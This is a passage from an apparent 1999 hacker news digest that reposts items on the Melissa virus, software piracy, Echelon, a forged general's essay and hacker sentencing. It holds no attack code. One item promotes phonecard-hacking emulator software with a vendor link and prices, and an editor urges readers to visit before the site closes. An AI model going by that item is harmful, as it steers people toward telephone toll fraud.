claims it can snare 85 percent of the new viruses without many false alarms. The recent Melissa virus showed that heuristics are not foolproof, as some viruses slip through the antivirus screen and must be fought with the traditional methods. Melissa was a macro virus that spread quickly because it self-replicated, sending email from the infected machine to recipients in that user's address book. Melissa illustrates why macro viruses worry antivirus researchers. "Melissa was trivial technically and important strategically," said ICSA's Thompson, mainly because it demonstrated the kinds of disruptions a computer virus can cause, he said. "Macro viruses are easy to create and easy to modify," said Carey Nachenberg, chief researcher at Symantec's antivirus research center. To combat viruses like Melissa, heuristics are a must, he said. Macros are a simple programming language used to build templates in Lotus Notes or Microsoft Excel. Because of their simplicity, they can be used to create macro viruses, said Chris Christiansen, security analyst at International Data Corporation. "There are rumored to be numerous automated applications that automatically generate macro viruses," said Christiansen, saying they are available on Web sites used by malicious hackers. "An unsophisticated user could write a macro virus or take a corporate macro and corrupt it, then replace a legitimate macro." Today antivirus researchers are closely watching another virus -- the Pretty Park virus, which is currently circulating in France -- that posts passwords and other identifying data to Internet chat sites. So far, it's a low level alert because its self-replicating function apparently doesn't work. Overall, a higher percentage of macro viruses could be caught, said Alladin chief technology officer Shimon Gruper, at the cost of more false alarms. "Not everything gets caught, so you still need a rule to catch it," said Susan Orbuch, spokeswoman for Trend Micro. "When there was a lot of fear about Melissa variants, we quickly put together some heuristics to combat it." @HWA 07.0 Eight Arrested in California ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 7th 1999 From HNN http://www.hackernews.com/ contributed by st1p3r 15,000 mass produced pirated copies of Microsoft applications where confiscated and eight people where arrested during a raid in Southern California last Thursday. They have been indicted on 45 counts of counterfeiting, conspiracy and money laundering. Nando Times http://www.techserver.com/story/body/0,1634,56660-90472-643309-0,00.html Microsoft program counterfeiters arrested Copyright © 1999 Nando Media Copyright © 1999 Associated Press LOS ANGELES (June 5, 1999 5:12 p.m. EDT http://www.nandotimes.com) - Eight people have been arrested in a counterfeiting scheme that police said churned out 15,000 phony copies of Microsoft computer programs every month. The Southern California residents were arrested Thursday, a day after being indicted on 45 counts of counterfeiting, conspiracy and money laundering. All are expected to enter pleas Monday. Five other people also were named in the federal grand jury indictment, including three who were arrested in February and freed on bond, the U.S. attorney's office said Friday. The ring pressed counterfeit CD-ROM disks of Windows 98 and other popular programs, printed bogus "certificates of authenticity" and then packaged and sold the disks overseas, authorities contend. Authorities in February raided several warehouses and seized a room-sized CD-ROM replicator. Also seized were color printing presses, packaging machines and other counterfeit items that Microsoft officials estimated were worth about $56 million on the retail market. @HWA 08.0 278 Internet Cafes Disciplined ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 7th 1999 From HNN http://www.hackernews.com/ contributed by Anonymous Public Action Number One, has been launched jointly by the city of Shanghai China's police force along with commercial, telecommunications and education authorities to standardize the city's public Internet cafes. Only 350 of the cities estimated 2000 internet cafes are authorized to do business. The crackdown has resulted in fines and warnings for many establishments that do not control users forays into cyberspace Nando Times http://www.techserver.com/noframes/story/0,2294,56247-89863-639407-0,00.html Shanghai tightens hold on Internet cafes Copyright © 1999 Nando Media Copyright © 1999 Reuters News Service SHANGHAI (June 4, 1999 12:11 p.m. EDT http://www.nandotimes.com) - Chinese boomtown Shanghai has disciplined 278 unregistered Internet cafes in a crackdown on uncontrolled forays into cyberspace, the official Liberation Daily reported on Friday. The move was aimed at "standardizing the city's public Internet cafes" where customers can sip coffee and surf "the Net," the newspaper said. A city government official said some of the unregistered cafes would be fined while others would be given a warning. The crackdown, described as "Public Action Number One," was launched jointly by the city's police and commercial, telecommunications and education authorities. Shanghai now has more than 2,000 Internet cafes but only 1,500 of them have applied to register and only 350 are authorized, the newspaper said. Local authorities have tightened control of information vendors around the 10th anniversary of the Beijing crackdown on dissent on June 3-4, 1989, when the army shot its way into Tiananmen Square to end seven weeks of pro-democracy protests. Late last month, Shanghai ordered local paging stations and computer information vendors to stop disseminating political news temporarily, including news downloaded from the Internet. China has seen explosive growth in the use of the Internet in recent years but the government has also viewed it as a potential threat to its authority. There are now an estimated two million Internet users in China and some experts predict the number of Web surfers could top 10 million by next year. @HWA 09.0 Forbidden Knowledge Issue #5 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 7th 1999 From HNN http://www.hackernews.com/ contributed by Anonymous Issue Five of the increasingly improving Forbidden Knowledge e-zine has been released. It features articles on Memory and Addressing Protection in Multiuser Operating Systems and some other very interesting topics. Check it out at the main site or at Packetstorm. Forbidden Knowledge http://www.posthuman.za.net @HWA 10.0 f41th Issue 6 ~~~~~~~~~~~~~ June 7th 1999 From HNN http://www.hackernews.com/ contributed by D4RKCYDE d4rkcyde has kept its work up and released issue 6 of the H/P ezine f4ith. The zine contains good h/p technical information and is available almost twice a month. Back issues are available. Issue 6 http://darkcyde.system7.org/files/faith/faith6.txt f41th 11.0 Antidote Vol2 Issue 7 ~~~~~~~~~~~~~~~~~~~~~ June 7th 1999 From HNN http://www.hackernews.com/ contributed by lordoak The newest issue of Antidote has been released with articles on PC Anywhere, Netscape, and much much more. Check it out. Antidote Vol2 Issue 7 http://www.thepoison.org/antidote/issues/vol2/7.txt 12.0 Will the Allies Drop CyberBombs on Milosevic? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 8th 1999 From HNN http://www.hackernews.com/ contributed by erewhon A well researched, no FUD, article that goes against the normal hype and sensationalism. William Larkin backs up HNNs earlier assessment of last weeks Newsweek reports of cyber attack against the bank accounts of Milosevich. A previous unseen transcript of a conference from the Air Force Association has allowed the Washington Post to conclude that Yugoslavia's bank accounts are probably pretty safe. (It is a welcome change to see good journalism now and again.) Washington Post http://www.washingtonpost.com/wp-srv/national/dotmil/arkin.htm The Good News on Forgery By William M. Arkin Special to washingtonpost.com Monday, June 21, 1999 "The decade begun in Kuwait ends in the skies over Serbia. No American government will, in the near future at least, simply assume that it has the military power needed to impose its will...." Thus retired Gen. John M. Shalikashvili grumbles about the "difference between being the greatest ... power in the world and omnipotence" and warns of the emergence of a "passive" and "isolationist" America as a result of the war in Yugoslavia. "The United States will be withdrawing from its aggressive leadership position not solely because it wishes to," says the former Chairman of the Joint Chiefs of Staff. "It will be withdrawing because it has seriously lost the trust of many of its NATO allies." Why? Besides committing insufficient military power in Yugoslavia, the air war, he says, is "not going to force a Serbian capitulation." The Shalikashvili essay, "The World After Kosovo," began circulating via e-mail about three weeks before Belgrade's withdrawal from Kosovo. It is a forgery. "Someone has stolen my name," Shalikashvili told the Seattle Post-Intelligencer, which revealed the fabrication on the final day of Operation Allied Force. Stolen, and Forwarded "This has been a major embarrassment to me," says a West Point graduate, after he circulated the Shalikashvili essay to his classmates. Like many other military observers, he received the commentary via e-mail. "I innocently passed along the article that had been forwarded to me clearly marked as being written by Gen. Shali from a network of senior retired military officers – a normally credible source!" As compliments and complaints alike poured in from friends and former aides, General Shalikashvili, who retired in October 1997, discussed with Defense Department spokesman Ken Bacon whether the electronic screed should be denounced from the Pentagon podium. They decided not to bring attention to the fake. Then Shalikashvili got a call from Deputy Secretary of State Strobe Talbott, who was asked by Finnish President Marti Ahtisaari whether the article might not complicate negotiations with President Slobodan Milosevic. Shalikashvili decided to go public: "I was hoping that it would go away, but this thing doesn't seem to be dying," he says. Floss, Dance, Don't be Fooled I know what you're thinking: The Internet has struck again. Faster than a speeding bullet an individual's identity has been stolen. An irresponsible and unregulated medium has perpetrated fraud and deceit. We've seen this time and again with the Web: Disgraces like Pierre Salinger's flogging of "intelligence" documents dealing with the TWA Flight 800 accident that turn out to be nothing more than conspiratorial drivel plucked from the Web. The "Floss, Dance, Don't Be Fooled" MIT commencement address that wasn't delivered by Kurt Vonnegut. The Internet does indeed have the capacity to amplify and duplicate what is real, as well as what is not. Yet for all the copying and forwarding and quoting of Shalikashvili's impostor discourse amongst a cyber-savvy network of retired generals and veterans who increasingly use e-mail as a lifeline, what is interesting is that the comments never really circulated outside of closed community. A check of Web-wide discussion group search engines (Deja.com, AltaVista, Forum One, Remarq) found that the essay was never sent to a single newsgroup. On the Web, there is only a single posting: on the FreeRepublic site ("The Web's premier conservative news discussion forum!"). Even here, where the retired military officer who distributed the essay described it as "the story of the current JCS members who have been silenced by the White House intimidation machine," the piece was quickly rejected. The same day it was posted, May 28, three participants identified the work as fraudulent. The system works! A Good Day for Bombing "The World After Kosovo" is a very good forgery. There is no obvious inflammatory language; it is a plausible viewpoint that someone could associate with a retired high-ranking officer. The news media, like the Web, proved less promiscuous than its popular reputation in running with the supposed dissent. When Pulitzer Prize-winning reporter Seymour Hersh received the e-mail from a recently retired two-star general, he was also warned that it may or may not be authentic. Hersh read the words with interest, but he says he would never have done anything with the file, including forwarding it, without contacting Shalikashvili first. Tom Ricks, the Pentagon correspondent for the Wall Street Journal, also received the Shalikashvili piece, in spades. "About 50 military officers credulously forwarded the 'Shali piece' to me," Ricks says. Ricks's newspaper made itself famous in January when it quoted from the e-mail of an Air Force general bragging about the bombing of Iraq. "It's a good day for bombing," the officer wrote. But after his utterances proved fair game for the mainstream media, the general, tail fin between his legs, told the Journal that he probably should have chosen his words better. E-mail has since proven a nettlesome medium for the closed world of retired and active duty officers. But before the Internet gets the blame, it should be made clear that the Shalikashvili episode is an embarrassment for a network of otherwise worldly military specialists who were fooled by the prose and perhaps even blinded by their own anti-Clinton animus. Though many questioned the authenticity of the retired general's words, they copied and forwarded the essay, Drudge-style. It was hardly a precision military formation. William M. Arkin can be reached for comment at william_arkin@washingtonpost.com © Copyright 1999 The Washington Post Company @HWA 13.0 Melissa Suspect Still not Charged ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 8th 1999 From HNN http://www.hackernews.com/ contributed by Scores Still free on $100,000 bail, David L. Smith has still not been officially charged with a crime. He has been accused of spreading the Melissa virus which rampaged through the countries computer networks within days of its release. A spokesperson for the defense claimed that they are just waiting on the DA. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2271206,00.html @HWA 14.0 ToorCon '99 Security Expo ~~~~~~~~~~~~~~~~~~~~~~~~~ DATE HAS CHANGED FOR THIS EVENT SEE SECTION 95.0 June 8th 1999 From HNN http://www.hackernews.com/ contributed by h1kari ToorCon will be held on August 7-8 in San Diego, California. It is being billed as a computer security convention hosted by the San Diego 2600 Meeting to help educate and inform the public on computer security related matters. ToorCon will feature: Speakers, Lectures, Hands-on Demonstrations, InstallFests, Root Contests, and raffles. HNN Cons Page http://www.hackernews.com/cons/cons.html @HWA 15.0 ISS Gets Free Advertising ~~~~~~~~~~~~~~~~~~~~~~~~~ June 8th 1999 From HNN http://www.hackernews.com/ contributed by lamer Here's a nice 'adverticle' for ISS. ISS must be really wonderful because they have "tangled" with cDc, that horrible hacker group that makes Microsoft's life "miserable". I don't suppose it's possible that MS makes its own life miserable by putting out 3rd rate software? Nah. And I don't suppose it is possible that the author of this article did any research other than contacting ISS? Nah. US News http://www.usnews.com/usnews/issue/990614/14hack.htm @HWA 16.0 Accounting Firms also get Free Advertising ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 8th 1999 From HNN http://www.hackernews.com/ contributed by Even lamer Not to be out done by ISS and the X-Force, Deloitte & Touche and PriceWaterhouse Coopers get there own adverticle detailing their joint venture the new cyber-"fraud squads". C|Net ISS Gets Free Advertising http://www.news.com/News/Item/Textonly/0,25,37419,00.html Accounting firms fight cybercrime By Dan Goodin Staff Writer, CNET News.com June 7, 1999, 4 a.m. PT URL: http://www.news.com/News/Item/0,4,37419,00.html The dramatic growth in computer-perpetrated crime has not been lost on big accounting firms, which smell a growing profit center in helping clients protect themselves against online trespassers. In the past six months, both Deloitte & Touche and PriceWaterhouse Coopers have formed new cyber-"fraud squads" to investigate crimes and evaluate security systems. The other big accounting firms, as well as IBM and smaller private investigation outfits, are also jumping into the game. "We think there are significant unmet needs," said Bill Boni, director of Price Waterhouse's cybercrime investigations group, which was created earlier this year. "It's certainly going to be an area of interest for all the large accounting firms." The reason for the interest is simple: Incidents of fraud and other crime perpetrated online are on the rise. Putting a number on the increase is difficult, since many incidents go unreported. One of the most useful measuring sticks, however, comes from annual reports released by the Computer Security Institute, which surveys 521 security practitioners from corporations, banks, government agencies, and universities. Last year, 32 percent said they reported serious incidents to law enforcement agencies, nearly twice the number as three years ago. Meanwhile, 55 percent said that company insiders gained unauthorized access to computer networks, and 30 percent reported intrusions by outsiders. The San Francisco-based group estimates that computer security breaches cost the respondents more than $123 million last year, and worldwide may cost businesses tens of billions of dollars, according to Richard Power, the organization's editorial director. "With the rise of the Internet and the transaction of e-commerce, corporations and government agencies are far more open to attack then ever before," Power told CNET News.com in an interview. "There are all kinds of new ways to make money through computer crime." That's where accounting firms come in. For a host of reasons, companies whose online security has been breached frequently prefer to take their problems to private investigators rather than law enforcement agencies. "Some [law enforcement agencies] have taken aggressive stances, but even in Silicon Valley you will find that most of the senior officials in police departments are not that sensitive to high-tech matters," said John O'Laughlin, director of worldwide security at Sun Microsystems. "Most of them are not up to speed in dealing with high-tech issues." Companies are also hesitant to go to authorities out of fear the matter will generate negative press. "Some of these companies don't want to admit that they've been compromised," said assistant U.S. attorney Chris Painter, who investigates high-tech crime. A benefit of taking a crime to private investigators is that companies can learn all the facts before deciding whether to take the matter to court. "They keep control of their information," said George Vinson, former head of the FBI's computer intrusion team in San Francisco and now practice leader for Deloitte & Touche's fraud and forensics team. "So many times [companies] are interested in settling something civilly rather than seeing it splashed on the A-1 page" of the local newspaper. The bulk of Vinson's work so far has been investigating claims of copyright infringement. Typically, that means comparing the source code of a client's software against that of a suspected infringing copy. Vinson also investigates people suspected of using the Internet to manipulate a company's stock price and tracks employees who misappropriate a company's trade secrets. The accounting firms also assess clients' security systems to make sure they are not vulnerable to attacks. The work is similar to what Vinson did while at the FBI. In 1996 his group brought down more than 20 Internet users in 10 states who used chat groups to trade software titles made by companies such as Adobe and Microsoft. And with more and more companies transacting business online, the demand for computer forensics services is only expected to continue, said Sun's O'Laughlin. "I don't think there's any question the e-commerce is here to stay," he said. "You're going to see that it's pretty vulnerable to fraud and abuse and [companies] want to get ahead of the curve." @HWA 17.0 Analyzer Starts Computer Security Business ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 9th 1999 From HNN http://www.hackernews.com/ Analyzer Starts Computer Security Business contributed by Code Kid Analyzer (Eric Tenenbaum) is still awaiting the final outcome in his trial in Israel after he was accused of breaking into the Pentagon computer systems. While waiting he has teamed up with three college students and hopes to raise 4.5 to 5 million dollars to create a security software package. Israel Business Globe http://www.globes.co.il/cgi-bin/Serve_Archive_Arena/pages/English/1.2.1.2/19990607/1 Tuesday , Jun 8, 1999 Sun-Thu at 18:00 (GMT+2) Headlines Exclusive: Analyzer Founds Computer Security Start-Up By Ronny Lifschitz Ehud Tenenbaum, known as the "Analyzer", still awaiting the commencement of hearings in his trial, following the exposure of his penetration of the Pentagon’s computers, is forming a computer security company. Tenenbaum’s partners are three students currently completing their studies in electronic engineering. The new company is negotiating with potential investors, and plans to raise $4.5-5 million for the purpose of developing a security software package, that will be able to monitor hackers’ activities. The other partners are Sharon Shani, Gil Bar-Noy, who was chairman of the students’ negotiating team in the tuition fee battle with the government, and another student, who prefers to remain anonymous. At the beginning of 1998, the three set up Webber Communications, a company which engaged primarily in the construction of Internet sites and consultation to Internet companies. "Our idea is very innovative, and is based on the hacker’s point of view", Tenenbaum explains to "Globes". "Our product will be able to adapt itself to the hackers’ evolving methods, and upgrade itself". Tenenbaum refused to give details of the type of security software the company is to develop, but said that he and his partners, who served with the IDF Intelligence Corps, will set up an intelligence system to monitor the modus operandi of hackers the world over, and thus close the gap existing between security companies and hackers. The young entrepreneurs believe that many organisations will purchase their future product, including NASA and the Pentagon. See accompanying feature: Analyzer II. Published by Israel's Business Arena June 7, 1999 @HWA 18.0 $2.9Bil in Piracy in The US ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 9th 1999 From HNN http://www.hackernews.com/ $2.9Bil in Piracy in The US contributed by Sinbad The Software Information & Industry Association has released a report that claims that the US is responsible for $2.9Bil worth of software piracy. The top ten cities alone represented $1Bil of that money. New York City was named the worst offending city with a piracy amount estimated at $259 million. It is kind of interesting how they come up with these numbers. Wired http://www.wired.com/news/news/business/story/20091.html Software Information & Industry Association http://www.siia.net/news/releases/piracy/6.8.99-Piracy-Release.htm Wired; ~~~~~~ Cities Singled Out for Piracy Wired News Report 4:15 p.m. 8.Jun.99.PDT Ten major metropolitan areas in the United States were responsible for more than US$1 billion in losses to software piracy in 1998, according to a study released today by the Software and Information Industry Association. New York, Los Angeles, and Chicago topped the list. Peter Beruk, vice president of the association's antipiracy program, said the cities were singled out because they feature the highest concentration of white-collar workers. The study estimated the losses for the New York metropolitan area to be $259 million, followed by that of Los Angeles with $159 million. Chicago was close behind with more than $112 million in losses. Beruk estimates that one in every four business software applications in use across the United States is an illegal copy. According to the SIIA report, the total loss throughout the US to software piracy in 1998 was $2.9 billion, a sizeable chunk of the $11 billion loss worldwide in 1998. - - - Brokers, beware: Online trades grew a record 47 percent to 500,000 a day in the first quarter, boosted by a strong stock market and the increasing appeal of Internet brokerages, an influential industry analyst said on Tuesday. "Online trading firms now appear to be penetrating the mass markets, not just the techno-philic early adopters," said analyst Bill Burnham, of securities firm Credit Suisse First Boston, in a research report. Almost 16 percent of all stock trades now take place in cyberspace, he added. "If the fourth quarter of 1998 was a record quarter for the industry, then the first quarter of 1999 was quite simply a complete blowout," Burnham said. Online trading grew at 34 percent to 340,000 a day between the third and fourth 1998 quarters. Online brokers, who two years ago handled, on average, just 95,500 trades a day, have been growing at a rapid pace, thanks in part to heavy advertising. Investors also keep flocking to Internet brokers because of low commissions -- an average $15.75 a trade -- and ease of use. The top five US Internet brokers -- Charles Schwab, ETrade Group, Waterhouse Securities, Datek Online, and Fidelity Investments -- had a 71.3 percent market share, up from 67.5 percent a year ago, Burnham said. ETrade and Ameritrade Holding, the No. 6 Internet broker, grew fastest in the first quarter, each processing at least 60 percent more trades than in the fourth quarter. - - - News Corp. invests in PlanetRx: PlanetRx.com, an online pharmacy, said Tuesday that it had raised an additional $50 million from private investors, including media company News Corp. News Corp. -- which owns companies such as 20th Century Fox, the Fox television network, and several newspapers around the world -- said PlanetRx.com's offerings would fit in with its plan to combine Fit TV, America's Health Network, and AHN.com into a new online health service. Other investors in this round of financing included ETrade, Tenet Healthcare, HealthSouth, and LVMH Group. The sizes of the individual investments weren't disclosed. PlanetRx.com plans to use the funding to advertise heavily, the company said. Reuters contributed to this report. Software Information & Industry Association; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ For Immediate Release Contact: Peter Beruk, VP, Anti-Piracy Programs, 202-452-1600, ext. 314, or pberuk@siia.net Keith Kupferschmid, Intellectual Property Counsel, 202-452-1600, ext. 327, or kkupfer@siia.net Software & Information Industry Association Unveils Top Ten “Most Wanted” Metro Areas For Software Piracy In United States Cities Responsible For More Than $1 Billion Of Software Piracy Losses In 1998 (June 8, 1999 - Washington, D.C.) - Ten major metropolitan areas in the United States were responsible for more than $1 billion of losses to software piracy in 1998, it was revealed today. The announcement was made by SPA, the anti-piracy division of the Software & Information Industry Association (SIIA), the largest trade association for the software code and information content industry. SPA unveiled its list of America’s “most wanted” metropolitan areas during the release of its 1999 Annual Global Piracy Report. The report estimates that a total of $2.9 billion was lost to software piracy throughout the United States during 1998, and that 85 countries were responsible for losses totaling $11 billion worldwide. Heading the SPA list was the New York metropolitan area, with an estimated $259 million of piracy losses in 1998. The Los Angeles metropolitan area was next with $159 million followed by Chicago with more than $112 million in losses. Other metropolitan areas on the list (in descending order of losses) were Washington-Baltimore, Boston-Nashua, San Francisco-Oakland, Philadelphia-Wilmington, Dallas-Fort Worth, Detroit-Ann Arbor, and Atlanta. A spokesperson for SPA said that the “Top Ten Most Wanted Metropolitan Areas” list would be released annually to highlight the seriousness of software piracy throughout the United States. “Software piracy is a crime. Our report, issued today, estimates that one in every four business software applications in use across the United States is an illegal copy. Knowingly or unknowingly, hundreds of companies are engaged in criminal activity every day, the moment their employees boot up their computers. This is unacceptable,” said Ken Wasch, president of SIIA. “For more than 10 years, SPA has led the fight against software piracy at home and abroad. By combining enforcement and education, we have been successful in reducing the rate of piracy in the United States from 48% when we began our anti-piracy program to an estimated 25% in 1998. But we do not intend to declare victory until software piracy is eliminated completely.” “Over the coming weeks, we plan to raise public awareness about the crime - and consequences - of software piracy. We want all Americans to understand that, regardless of whether the piracy is committed between friends and co-workers or by businesses or whether it is committed through illegal rental, counterfeiting or increasingly via the Internet, it affects more than just the largest software publishers. Of SIIA’s 1,400 member companies, 60% have annual revenues of less than $2 million. Software piracy can put those companies - and their employees - out of business and out of work within a matter of weeks. Through heightened enforcement and education efforts, we will drive this message home,” Wasch said. “Additionally, we will continue to work closely with the Department of Justice and the FBI in their continuing efforts to eliminate software piracy around the world. We applaud the recent statement by the Department of Justice that the FBI is working closely with law enforcement officials in other countries to combat computer crimes and enhance coordination and improve their combined capabilities.” The Software & Information Industry Association (SIIA) is the principal trade association of the software code and information content industry. SIIA represents more than 1,400 leading high-tech companies that develop and market software and electronic content for business, education, consumers and the Internet. Hundreds of these companies look to SIIA to protect their intellectual property around the world. Additional information on its anti-piracy program can be found at www.spa.org/piracy. To report software piracy, call (800) 388-7478. SIIA was formed on Jan. 1, 1999, as a result of the merger between the Software Publishers Association (SPA) and the Information Industry Association (IIA). Information on SIIA and its wide-range of activities can be found at www.siia.net. Copies of the 1999 Global Piracy Report can be found at www.siia.net/news/releases/piracy/98globalpiracy.htm or by contacting David Phelps at 202-452-1600, ext. 320 The 1999 SPA “Ten Most Wanted Metropolitan Areas” List (based on revenue losses due to software piracy in 1998) 1. New York-Northern NJ-Long Island - - $259,804,592 2. Los Angeles-Anaheim-Riverside - - $159,572,768 3. Chicago-Gary-Kenosha - - $112,201,219 4. Washington-Baltimore - - $86,752,957 5. Boston-Nashua - - $80,740,945 6. San Francisco-Oakland - - $79,993,397 7. Philadelphia-Wilmington - - $59,829,725 8. Dallas-Fort Worth - - $62,080,995 9. Detroit-Ann Arbor-Flint - - $61,379,449 10. Atlanta - - $50,479,623 @HWA 19.0 Congress and NSA tangle over Echelon ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 9th 1999 From HNN http://www.hackernews.com/ Congress and NSA tangle over Echelon contributed by oolong The US Congress and the NSA seem to be butting heads over ECHELON. While all this sounds altruistic, you can bet that it's the beginning of a high level power struggle over who controls the information. Federal Computer Week http://www.fcw.com/pubs/fcw/1999/0531/web-nsa-6-3-99.html JUNE 3, 1999 . . . 18:34 EDT Congress, NSA butt heads over Echelon BY DANIEL VERTON (dan_verton@fcw.com) Congress has squared off with the National Security Agency over a top-secret U.S. global electronic surveillance program, requesting top intelligence officials to report on the legal standards used to prevent privacy abuses against U.S. citizens. According to an amendment to the fiscal 2000 Intelligence Authorization Act proposed last month by Rep. Bob Barr (R-Ga.), the director of Central Intelligence, the director of NSA and the attorney general must submit a report within 60 days of the bill becoming law that outlines the legal standards being employed to safeguard the privacy of American citizens against Project Echelon. Echelon is NSA's Cold War-vintage global spying system, which consists of a worldwide network of clandestine listening posts capable of intercepting electronic communications such as e-mail, telephone conversations, faxes, satellite transmissions, microwave links and fiber-optic communications traffic. However, the European Union last year raised concerns that the system may be regularly violating the privacy of law-abiding citizens [FCW, Nov. 17, 1998]. However, NSA, the supersecret spy agency known best for its worldwide eavesdropping capabilities, for the first time in the history of the House Permanent Select Committee on Intelligence refused to hand over documents on the Echelon program, claiming attorney/client privilege. Congress is "concerned about the privacy rights of American citizens and whether or not there are constitutional safeguards being circumvented by the manner in which the intelligence agencies are intercepting and/or receiving international communications...from foreign nations that would otherwise be prohibited by...the limitations on the collection of domestic intelligence," Barr said. "This very straightforward amendment...will help guarantee the privacy rights of American citizens [and] will protect the oversight responsibilities of the Congress which are now under assault" by the intelligence community. Calling NSA's argument of attorney/client privilege "unpersuasive and dubious," committee chairman Rep. Peter J. Goss (R-Fla.) said the ability of the intelligence community to deny access to documents on intelligence programs could "seriously hobble the legislative oversight process" provided for by the Constitution and would "result in the envelopment of the executive branch in a cloak of secrecy." @HWA 20.0 Emutronix Phone Hacking Products releases new Mach emulator ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 9th 1999 From HNN http://www.hackernews.com/ Emutronix Revs Mach contributed by Fr3akm4n Emutronix Phonecard Hacking Products have released their latest version of the Mach Emulation Software. Version 2.1 incorporates an easier working panel and is much more user friendly. Emutronix http://fly.to/mach3 (I'd check this site out b4 it gets closed down cards start at $350 with a one year guarentee for any country except France... - Ed ) 21.0 Is That Spelled With a "PH" or an "F" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 10th 1999 From HNN http://www.hackernews.com/ contributed by smith The Concise Oxford Dictionary has added some new words to its vernacular. One notable inclusion is the word "Phreaking" with a definition of hacking into the telephone network. Other new words include firewall and portal among others. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2272766,00.html The Concise Oxford Dictionary http://www.oed.com @HWA 22.0 The Demonizing of the Hacker ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 10th 1999 From HNN http://www.hackernews.com/ contributed by Weld Pond Are years in jail the correct answer for teenage script kiddies who deface web pages? Are dangerous precedents being created today that will limit personal freedom tomorrow? Are we running the risk of turning criminals into cultural icons? Peter Wayner takes a look at these complex questions. Salon http://www.salonmagazine.com/tech/feature/1999/06/09/hacker_penalties/index.html Should hackers spend years in prison? Stiff penalties for computer trespassing could create a broad new class of criminal -- including you and me. - - - - - - - - - - - - BY PETER WAYNER June 9, 1999 | The FBI recently declared war on those pesky hackers -- again. The news is filled with the story of some group known as Global Hell that is breaking into Web sites and causing mayhem. The FBI is cracking down, confiscating computers and taking names; and some hackers are actually fighting back and shutting down some government Web sites. The press loves hackers because computer crime is something new. (I'm using "hackers" the way the media does, to describe those who get their kicks breaking into computer systems, rather than the older usage describing those who delight in difficult software coding work.) Murder, rape, drug dealing, theft and fraud continue as always, with ups and downs in their rates -- but teenagers breaking into Web sites is something no one has seen before. The problem with the war against hackers is that most of what the hackers are supposedly doing would be trivial if it weren't happening on the Internet. The typical hacker attack on a Web site isn't much different from scrawling graffitti on the outside of a building. Many attackers are just poking around -- like suburban teenagers who hop a fence to jump into a pool. All of this would be great theater and a nice distraction from the war in Kosovo if it weren't inspiring some serious reprisals in the courts -- and some ominous inflation in sentencing that could wind up affecting everyone who uses computers in his or her daily life. Wars on hackers are usually followed by calls for legislators to "do something!" and campaigns for new laws to crack down on the bad guys. The problem is that "doing something" often produces laws that treat the same action much more harshly in cyberspace than in "meatspace." The archetype of the demon hacker is Kevin Mitnick, a young man who has spent more than four years in jail waiting for his trial. When he was arrested, Monica Lewinsky was in her last year of college. During this time, Mitnick and his attorneys have jousted with government lawyers in endless pre-trial maneuvers that seem to have ended recently when Mitnick decided to plead guilty, probably hoping to receive a sentence that would be limited to time served. But even that deal is uncertain and taking forever to evolve; meanwhile, for Mitnick it's just prison without a trial and with no bail. Many, no doubt, see the crackdown on folks like Kevin Mitnick as a great deal for society: Information can be stolen just like anything else; surely the thieves who traffic in such goods should be locked up, just like car-jackers and muggers. But there's also a hidden danger. The precedents that the courts set now for dealing with demons like Mitnick will also apply equally to everyone who follows. And it's not clear that the world is ready for Mitnick-like sentences for the crimes he might have committed, which remain murkily defined. Think about it: Someone who reads another person's Rolodex is just a snoop, but someone who clicks through somebody else's Palm Pilot is hacking a computer database. It's easy to see just how slippery the calculus of evil gets on the cutting edge of technology. 2600 Magazine, The Hacker Quarterly, recently posted letters from computer manufacturers like Sun and Motorola estimating their losses to Mitnick's alleged theft of computer source code. After Mitnick's arrest, he was said to have stolen billions of dollars of information. Some companies calculated their loss by simply listing the hundreds of millions of dollars in development cost of the software affected -- that is, the cost of all the programmers, their computers and other overhead. Other companies were a bit more careful and noted that the value was difficult to judge, but that recalls of products like cell phones could be costly. The problem is, the price tag of information is almost impossible to determine. If Mitnick did take a copy of these companies' source code, the companies weren't denied the use of it, as when a mugger steals cash. Mitnick's lawyers seem ready to point out that the companies involved didn't bother to announce an official price on what they lost to Mitnick -- something that the Securities and Exchange Commission requires public companies to do if the losses are significant enough. That would have required strict accounting measures. To make matters even cloudier, in the meantime, Sun Microsystems began giving away the source code to its operating system to students around the world. In other words, if Mitnick had only waited a few years, enrolled in a university and asked nicely, he might have been a poster boy for Sun's charity instead of a prisoner. Today, Sun is even circulating the source code to products like Java in hope of recruiting customers and snagging bug fixes. The company is practically begging people around the world to come take a look at its code. This big change in the customs and attitudes of the software industry strains the arguments against hackers. If giving away the source code is now a "good thing" for corporations, did Mitnick and the other hackers do a smaller good thing by grabbing it ahead of time? Is Mitnick now a bit closer to being a Robin Hood instead of a demon? If Linux triumphs, will children be told tales of the dark days when the Sheriff of Notingham sat on the boards of all of the corporations and forced them to keep their source code proprietary so only the nobles could enjoy its bounty? Is it true that begging forgiveness is always easier than asking permission? Such questions may be impossible to answer, but they illustrate just how confusing it can be in the nether-netherworld of information's hall of mirrors. As a commodity, information is fundamentally different from objects, and society has always graced it with special respect. The journalists who printed the stories about the allegedly racist words that appeared on a secret audio tape of Texaco employees looked like crusaders. But if it had been a digital tape, the reporters could be painted as hacking data compiled by a Texaco employee on Texaco time. In the long run, society is going to have to think differently about hackers and the crimes with which they are charged. Taking information when it's printed on paper is not always bad, and there's no reason we should change this rule just because the information is stored on a computer disk. The intent of the criminal and the extent of the malice has always played a crucial role in our system of criminal justice. Many owners of things will forgive a theft if the "borrower" merely returns it unharmed. Crimes like trespassing are rarely prosecuted if someone just hops a fence and does no damage. Computers and the Internet continue to frighten people, but prosecuting hackers 